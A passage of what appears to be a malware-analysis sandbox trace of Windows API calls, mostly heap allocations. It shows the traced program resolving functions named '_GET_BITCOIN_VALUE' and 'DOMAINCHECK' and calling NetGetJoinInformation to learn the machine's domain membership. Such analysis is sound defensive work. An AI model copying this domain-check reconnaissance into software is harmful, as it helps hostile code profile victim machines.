hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba318 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24b0 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2eea8 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba300 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ee80 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2430 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ee58 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ee30 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19e0 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ee08 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc928 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd030 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1860 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ede0 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7e60 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcaa8 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e24a0 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2eed0 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca00 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2540 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18d0 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0244.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ea48 | out: hHeap=0x8a0000) returned 1 [0244.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0fb8 | out: hHeap=0x8a0000) returned 1 [0244.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a80 | out: hHeap=0x8a0000) returned 1 [0244.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0244.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d60 | out: hHeap=0x8a0000) returned 1 [0244.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0e20 | out: hHeap=0x8a0000) returned 1 [0244.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0244.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0244.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0244.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca48 | out: hHeap=0x8a0000) returned 1 [0244.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0244.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba060 | out: hHeap=0x8a0000) returned 1 [0244.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2dfd0 | out: hHeap=0x8a0000) returned 1 [0244.213] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0244.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2dfd0 [0244.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba060 [0244.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0244.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9b8 [0244.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a80 [0244.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1150 [0244.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca48 [0244.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1920 [0244.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf348 [0244.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca48 | out: hHeap=0x8a0000) returned 1 [0244.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca48 [0244.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0e20 [0244.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf348 | out: hHeap=0x8a0000) returned 1 [0244.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca48 | out: hHeap=0x8a0000) returned 1 [0244.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1150 | out: hHeap=0x8a0000) returned 1 [0244.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a80 | out: hHeap=0x8a0000) returned 1 [0244.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0244.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca48 [0244.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0244.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a80 [0244.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf348 [0244.215] CharUpperBuffW (in: lpsz="_GET_BITCOIN_VALUE", cchLength=0x12 | out: lpsz="_GET_BITCOIN_VALUE") returned 0x12 [0244.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf348 | out: hHeap=0x8a0000) returned 1 [0244.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a80 | out: hHeap=0x8a0000) returned 1 [0244.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc940 [0244.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db7b0 [0244.215] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0244.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a80 [0244.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18d0 [0244.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ea48 [0244.215] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0244.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ea48 | out: hHeap=0x8a0000) returned 1 [0244.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18d0 | out: hHeap=0x8a0000) returned 1 [0244.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc970 [0244.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db7f8 [0244.215] PeekMessageW (in: lpMsg=0x87f47c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f47c) returned 0 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18d0 [0244.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18d0 | out: hHeap=0x8a0000) returned 1 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ea48 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d60 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18d0 [0244.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d60 | out: hHeap=0x8a0000) returned 1 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf348 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d60 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2eed0 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17c0 [0244.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9d0 | out: hHeap=0x8a0000) returned 1 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0xa3d460 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc9d0 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ede0 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca00 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2540 [0244.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca00 | out: hHeap=0x8a0000) returned 1 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0xa3d3b8 [0244.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca00 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ee08 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcaa8 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24a0 [0244.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcaa8 | out: hHeap=0x8a0000) returned 1 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0xa3d3f0 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcaa8 [0244.217] PeekMessageW (in: lpMsg=0x87f47c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f47c) returned 0 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ee30 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd030 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1860 [0244.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd030 | out: hHeap=0x8a0000) returned 1 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ee58 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd030 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc928 [0244.217] PeekMessageW (in: lpMsg=0x87f47c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f47c) returned 0 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19e0 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2430 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db060 [0244.217] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0244.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db060 | out: hHeap=0x8a0000) returned 1 [0244.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2430 | out: hHeap=0x8a0000) returned 1 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc958 [0244.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e2430 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba300 [0244.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2430 | out: hHeap=0x8a0000) returned 1 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ee80 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba318 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2430 [0244.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba318 | out: hHeap=0x8a0000) returned 1 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2eea8 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba318 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db060 [0244.218] PeekMessageW (in: lpMsg=0x87ef4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ef4c) returned 0 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2dff8 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4c8 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e24b0 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba450 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4b0 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1830 [0244.218] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4b0 | out: hHeap=0x8a0000) returned 1 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e6b0 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4b0 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0244.218] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba030 [0244.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba660 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3a8 [0244.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5e8 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0244.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba690 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5a0 [0244.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba480 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba468 [0244.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7e60 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7f68 [0244.219] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c83b8 [0244.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c82c8 [0244.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8118 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8010 [0244.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db960 [0244.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e6b0 | out: hHeap=0x8a0000) returned 1 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8238 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0244.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1870 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7c50 [0244.220] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c80a0 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1910 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8070 [0244.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c80a0 | out: hHeap=0x8a0000) returned 1 [0244.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0244.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8070 | out: hHeap=0x8a0000) returned 1 [0244.220] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1910 | out: hHeap=0x8a0000) returned 1 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e6b0 [0244.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1910 [0244.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8070 [0244.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0244.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2520 [0244.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c80a0 [0244.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8070 | out: hHeap=0x8a0000) returned 1 [0244.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0244.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c80a0 | out: hHeap=0x8a0000) returned 1 [0244.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2520 | out: hHeap=0x8a0000) returned 1 [0244.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2520 [0244.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c80a0 [0244.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0244.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2510 [0244.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8070 [0244.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c80a0 | out: hHeap=0x8a0000) returned 1 [0244.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0244.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8070 | out: hHeap=0x8a0000) returned 1 [0244.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2510 | out: hHeap=0x8a0000) returned 1 [0244.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2510 [0244.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8070 [0244.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0244.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2350 [0244.221] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c80a0 [0244.221] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8070 | out: hHeap=0x8a0000) returned 1 [0244.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0244.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c80a0 | out: hHeap=0x8a0000) returned 1 [0244.222] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2350 | out: hHeap=0x8a0000) returned 1 [0244.222] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x74390000 [0244.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c8130 [0244.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2350 [0244.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0244.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x16) returned 0xbd1150 [0244.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetGetJoinInformation", cchWideChar=22, lpMultiByteStr=0xbd1150, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetGetJoinInformation", lpUsedDefaultChar=0x0) returned 22 [0244.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c8130 | out: hHeap=0x8a0000) returned 1 [0244.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e750 [0244.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1150 | out: hHeap=0x8a0000) returned 1 [0244.234] GetProcAddress (hModule=0x74390000, lpProcName="NetGetJoinInformation") returned 0x74352c3f [0244.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e750 | out: hHeap=0x8a0000) returned 1 [0244.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2350 | out: hHeap=0x8a0000) returned 1 [0244.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e750 [0244.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e2350 [0244.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0244.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18a0 [0244.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20002) returned 0xac1f98 [0244.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2350 | out: hHeap=0x8a0000) returned 1 [0244.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0244.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0244.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e750 | out: hHeap=0x8a0000) returned 1 [0244.235] NetGetJoinInformation (in: lpServer="", lpNameBuffer=0x87e8e8, BufferType=0x87e900 | out: lpNameBuffer=0x87e8e8*="WORKGROUP", BufferType=0x87e900) returned 0x0 [0244.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0244.240] RtlAllocateHeap 